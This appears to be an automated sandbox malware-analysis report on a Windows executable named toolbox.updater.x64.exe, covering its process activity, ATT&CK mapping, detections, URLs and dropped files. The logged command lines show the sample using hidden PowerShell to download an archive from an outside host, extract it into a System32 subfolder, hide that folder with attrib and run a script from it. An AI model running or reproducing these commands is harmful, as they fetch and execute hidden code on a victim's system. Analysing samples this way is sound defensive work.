Source: C:\Users\user\Desktop\toolbox.updater.x64.exe TID: 5072Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exe TID: 4248Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500Thread sleep count: 1819 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500Thread sleep count: 986 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep count: 1453 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep count: 775 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-USJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmdJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-USJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeQueries volume information: C:\Users\user\Desktop\toolbox.updater.x64.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsPowerShell1Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 323322 Sample: toolbox.updater.x64.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 26 20 Suspicious powershell command line found 2->20 7 toolbox.updater.x64.exe 5 2->7         started        process3 signatures4 22 Suspicious powershell command line found 7->22 10 powershell.exe 17 7->10         started        12 powershell.exe 7 7->12         started        14 powershell.exe 7 7->14         started        16 3 other processes 7->16 process5 process6 18 conhost.exe 10->18         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
toolbox.updater.x64.exe6%VirustotalBrowse
toolbox.updater.x64.exe0%MetadefenderBrowse
toolbox.updater.x64.exe0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5sProgramFil0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zkA0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://go.microsoft.co&0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0y20%Avira URL Cloudsafe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0%Avira URL Cloudsafe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t50%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmpfalse
      		high
      http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5sProgramFilpowershell.exe, 00000002.00000002.666889217.00000282B7120000.00000004.00000040.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://go.micropowershell.exe, 00000006.00000002.714170115.00000252A2BA3000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zkApowershell.exe, 00000002.00000002.666633430.00000282B6FD6000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://contoso.com/powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpfalse
        		high
        https://contoso.com/Licensepowershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://go.microsoft.co&powershell.exe, 00000002.00000002.668658456.00000282B8F04000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		low
        https://contoso.com/Iconpowershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0y2powershell.exe, 00000002.00000002.669629568.00000282B9248000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zpowershell.exe, 00000002.00000002.666506406.00000282B6F50000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5powershell.exe, 00000002.00000002.667108518.00000282B89F0000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.668443505.00000282B8E80000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametoolbox.updater.x64.exe, 00000000.00000002.694354112.0000000002531000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.679992499.000001E580001000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.706675027.00000252A12E1000.00000004.00000001.sdmpfalse
          		high
          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmpfalse
            		high

            Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:323322
            Start date:26.11.2020
            Start time:18:54:01
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 25s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:toolbox.updater.x64.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:21
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:SUS
            Classification:sus26.winEXE@13/11@0/0
            EGA Information:
            • Successful, ratio: 25%
            HDC Information:
            • Successful, ratio: 3.2% (good quality ratio 2.3%)
            • Quality average: 59%
            • Quality standard deviation: 40.4%
            HCA Information:
            • Successful, ratio: 97%
            • Number of executed functions: 29
            • Number of non-executed functions: 1
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            Warnings:
            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
            • Execution Graph export aborted for target powershell.exe, PID 496 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 6136 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 6728 because it is empty
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            TimeTypeDescription
            18:55:11API Interceptor34x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\toolbox.updater.x64.exe.log
            Process:C:\Users\user\Desktop\toolbox.updater.x64.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4254
            Entropy (8bit):5.363392037456809
            Encrypted:false
            SSDEEP:96:iqnwmI0qerYqGgAo3+aJtIz6cxBAmRvBIQYrjVxmc5qCqKP5t2qBtzG1Cqs:iqnwmI0qerYqGDeIz6rjjqCqKRt2qBt1
            MD5:C982F749A7FBDF386134C19F3F07B51A
            SHA1:F29DEE052717A2E9B5C8365E81E37078F49743D5
            SHA-256:0123BBE65B5BD9148978971D0B95CAF5792E017C3F532929FA40309A718E5FDE
            SHA-512:95E008DC02E07B2C03E81326A6014B4DAACF3A76AC0D83B3302763C0C625E0AAC154B7BBD3202C2E281F681DD68E6E0A08FD4554B66B10CF8540F7148D715592
            Malicious:false
            Reputation:low
            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30
            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):1108
            Entropy (8bit):5.24868687277073
            Encrypted:false
            SSDEEP:24:3Y5sPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKEbC:o5sPerB4nqRL/HvFe9t4Cv94zO
            MD5:839575D4F6EC7D87C96D556B27AB8F8F
            SHA1:7F44FAB4E52AFFB4AAAC249EF49149FC0126164F
            SHA-256:729A8D99A55144AC1BAC3E6B00F1451A9784FD23C7C0AEDC8F8F2BADFE5CA0E1
            SHA-512:4DB227AE77A13554ED0ED0B0D28F3000A7D99372F35F1513BC00D50CE03E03098E14B0E5D12EF01DB4F30DFBCA50A4359857B6606616B2DAF510D99DC5C40CDD
            Malicious:false
            Reputation:low
            Preview: @...e...................................#.......................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14cfabvt.t1e.psm1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview: 1
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c13xbjkz.ite.psm1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview: 1
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnckztsr.jym.psm1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview: 1
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf35m2r4.rts.ps1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview: 1
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnik53oy.1ts.ps1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview: 1
            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdcsclge.euw.ps1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview: 1
            C:\Users\user\Documents\20201126\PowerShell_transcript.142233.tkFHzEDB.20201126185510.txt
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
            Category:dropped
            Size (bytes):3803
            Entropy (8bit):5.339773847554602
            Encrypted:false
            SSDEEP:96:BZkj/N9qDo1ZSZ1j/N9qDo1ZKHvg0F0r0hZs:wvg0F0r0A
            MD5:DD52FCEACC7BCA9E44C17A40D0BAEF72
            SHA1:1CBD56063F770FC9CA2DCAEC24064AE0BC4F8B67
            SHA-256:80007EDA24FCFCD5556837CBC0E9ECF8053E436C5A6229EEBA7C67B240690594
            SHA-512:DF2D1F810AC304B762DCBA4EE906291939643E0098A2DA4A5D7E749CFFC5A58DE6B8D65A7DAB38ABC05A986CDD030AEC34FEEE638B85056F734E21CF78463FBD
            Malicious:false
            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201126185510..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 142233 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\wbem\en-US\update.cmd..Process ID: 6728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201126185510..**********************..PS>C:\Windows\System32\wbem\en-US\update.cmd..**********************..Windows PowerShell transcript start..Start time: 20201126185511..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 142233 (Microsoft Windows NT 10.0.1713

            Static File Info

            General

            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
            Entropy (8bit):5.604636793485997
            TrID:
